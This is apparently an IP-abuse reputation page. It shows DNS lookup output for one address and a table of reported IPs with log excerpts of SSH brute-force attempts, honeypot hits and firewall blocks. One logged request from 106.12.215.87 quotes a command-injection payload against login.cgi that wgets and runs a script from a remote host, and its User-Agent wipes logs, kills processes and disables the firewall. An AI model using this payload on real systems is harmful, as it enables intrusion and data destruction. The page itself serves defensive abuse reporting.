City: unknown
Region: unknown
Country: Finland
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 137.96.94.69
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 57402
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;137.96.94.69. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025030800 1800 900 604800 86400
;; Query time: 36 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Mar 08 20:19:39 CST 2025
;; MSG SIZE rcvd: 105Host 69.94.96.137.in-addr.arpa. not found: 3(NXDOMAIN)Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 69.94.96.137.in-addr.arpa: NXDOMAIN| IP | Type | Details | Datetime |
|---|---|---|---|
| 5.29.174.110 | attack | Honeypot attack, port: 445, PTR: PTR record not found |
2019-07-17 11:38:53 |
| 41.35.53.114 | attackbots | Honeypot attack, port: 23, PTR: host-41.35.53.114.tedata.net. |
2019-07-17 11:33:36 |
| 118.163.193.82 | attack | Jun 7 15:22:46 server sshd\[36010\]: Invalid user martin from 118.163.193.82 Jun 7 15:22:46 server sshd\[36010\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.163.193.82 Jun 7 15:22:48 server sshd\[36010\]: Failed password for invalid user martin from 118.163.193.82 port 52917 ssh2 ... |
2019-07-17 11:08:40 |
| 213.209.218.2 | attack | Honeypot attack, port: 445, PTR: mail.nsi.it. |
2019-07-17 11:45:05 |
| 120.214.191.61 | attack | Honeypot attack, port: 23, PTR: PTR record not found |
2019-07-17 11:42:13 |
| 222.122.94.10 | attackspambots | Jul 16 01:12:18 shared03 sshd[14773]: Invalid user tf2server from 222.122.94.10 Jul 16 01:12:18 shared03 sshd[14773]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.122.94.10 Jul 16 01:12:20 shared03 sshd[14773]: Failed password for invalid user tf2server from 222.122.94.10 port 46126 ssh2 Jul 16 01:12:21 shared03 sshd[14773]: Received disconnect from 222.122.94.10 port 46126:11: Bye Bye [preauth] Jul 16 01:12:21 shared03 sshd[14773]: Disconnected from 222.122.94.10 port 46126 [preauth] ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=222.122.94.10 |
2019-07-17 11:40:00 |
| 118.163.24.179 | attack | Apr 24 14:47:24 server sshd\[132555\]: Invalid user us from 118.163.24.179 Apr 24 14:47:24 server sshd\[132555\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.163.24.179 Apr 24 14:47:26 server sshd\[132555\]: Failed password for invalid user us from 118.163.24.179 port 38540 ssh2 ... |
2019-07-17 11:08:20 |
| 117.50.73.241 | attackbotsspam | Jun 17 02:33:22 server sshd\[55478\]: Invalid user jfagan from 117.50.73.241 Jun 17 02:33:22 server sshd\[55478\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.50.73.241 Jun 17 02:33:24 server sshd\[55478\]: Failed password for invalid user jfagan from 117.50.73.241 port 45426 ssh2 ... |
2019-07-17 11:24:04 |
| 116.62.217.151 | attackbots | 16.07.2019 22:00:40 Recursive DNS scan |
2019-07-17 11:08:03 |
| 117.2.19.224 | attack | Jul 4 00:43:44 server sshd\[97760\]: Invalid user tomcat from 117.2.19.224 Jul 4 00:43:44 server sshd\[97760\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.2.19.224 Jul 4 00:43:46 server sshd\[97760\]: Failed password for invalid user tomcat from 117.2.19.224 port 54566 ssh2 ... |
2019-07-17 11:44:28 |
| 84.123.13.17 | attackspam | SSH Bruteforce Attack |
2019-07-17 11:09:26 |
| 106.12.215.87 | attackbots | 106.12.215.87 - - [16/Jul/2019:23:03:55 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.203.234/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;" ... |
2019-07-17 11:14:20 |
| 104.152.52.36 | attackbotsspam | Jul 17 00:04:59 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:50:56:3c:4d:20:28:99:3a:4d:23:91:08:00 SRC=104.152.52.36 DST=213.136.73.128 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=63094 PROTO=TCP SPT=54699 DPT=6000 WINDOW=1024 RES=0x00 SYN URGP=0 Jul 17 00:05:01 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:50:56:3c:4d:20:28:99:3a:4d:23:91:08:00 SRC=104.152.52.36 DST=213.136.73.128 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=990 PROTO=TCP SPT=54699 DPT=8009 WINDOW=1024 RES=0x00 SYN URGP=0 Jul 17 00:05:02 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:50:56:3c:4d:20:28:99:3a:4d:23:91:08:00 SRC=104.152.52.36 DST=213.136.73.128 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=4075 PROTO=TCP SPT=54699 DPT=138 WINDOW=1024 RES=0x00 SYN URGP=0 Jul 17 00:05:02 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00:50:56:3c:4d:20:28:99:3a:4d:23:91:08:00 SRC=104.152.52.36 DST=213.136.73.128 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=46767 PROTO=TCP SPT=54699 DPT=8172 WINDOW=1024 RES=0x00 SYN URGP=0 Jul 17 00:05:02 mail kernel: [UFW BLOCK] IN=eth0 OUT= MAC=00 |
2019-07-17 11:18:52 |
| 51.83.15.30 | attack | Jul 17 02:21:26 MK-Soft-VM6 sshd\[23021\]: Invalid user li from 51.83.15.30 port 49740 Jul 17 02:21:26 MK-Soft-VM6 sshd\[23021\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.83.15.30 Jul 17 02:21:29 MK-Soft-VM6 sshd\[23021\]: Failed password for invalid user li from 51.83.15.30 port 49740 ssh2 ... |
2019-07-17 11:29:07 |
| 118.107.233.29 | attackspambots | Jun 30 00:47:51 server sshd\[203647\]: Invalid user ubuntu from 118.107.233.29 Jun 30 00:47:51 server sshd\[203647\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.107.233.29 Jun 30 00:47:53 server sshd\[203647\]: Failed password for invalid user ubuntu from 118.107.233.29 port 42198 ssh2 ... |
2019-07-17 11:18:29 |